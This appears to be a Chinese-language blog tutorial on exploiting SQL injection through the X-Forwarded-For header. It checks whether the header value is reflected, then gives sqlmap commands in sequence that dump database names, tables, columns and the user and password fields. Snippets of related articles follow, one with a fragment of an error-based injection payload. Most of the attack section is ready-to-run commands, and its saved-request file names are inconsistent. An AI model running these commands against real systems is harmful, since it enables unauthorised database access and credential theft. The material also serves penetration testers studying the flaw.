測試思路
1、登入後台提示ip資訊不正確,這種情況一般是x-forwarded-for讀取客戶端ip
2、通過在資料報新增x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1
3、如果存在則證明用x-forwarded-for讀取客戶端資料,則存在注入漏洞
4、通過在登入框資料報中新增x-forwarded-for:*,用sqlmap 跑注入,跑資料庫名,表名,欄位名,字段內容
測試步驟
1、登陸隨意輸入密碼,返回提示
2、在資料報新增x-forwarded-for:1.1.1.1看 respone包中是否存在1.1.1.1
3、存在此漏洞,儲存請求包到1.txt裡(x-forwarded-for值改為*)
4、使用sqlmap開始跑,
1)sqlmap爆出庫名:sqlmap -r d:/aaa.txt --db --batch
2)表名:sqlmap -r d:/aaa.txt -d webcalender --tables --batch
3)字段:sqlmap -r d:/aa.txt -d webcalender -t user --columns --batch
4)字段內容:sqlmap -r d:/aa.txt -d webcalender -t user -c 'user,password' --batch
獲取賬號與密碼
x forwarded for的深度挖掘
x forwarded for的深度挖掘 如今利用nginx做負載均衡的例項已經很多了,針對不同的應用場合,還有很多需要注意的地方,本文要說的就是在通過cdn 後到達nginx做負載均衡時請求頭中的x forwarded for項到底發生了什麼變化。下圖為簡單的web架構圖 先來看一下x forwa...
X Forwarded For 的一些理解
x forwarded for 是乙個 http 擴充套件頭部,主要是為了讓 web 伺服器獲取訪問使用者的真實 ip 位址 其實這個真實未必是真實的,後面會說到 那為什麼 web 伺服器只有通過 x forwarded for 頭才能獲取真實的 ip?x forwarded for client1...
SQL注入 報錯注入
乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...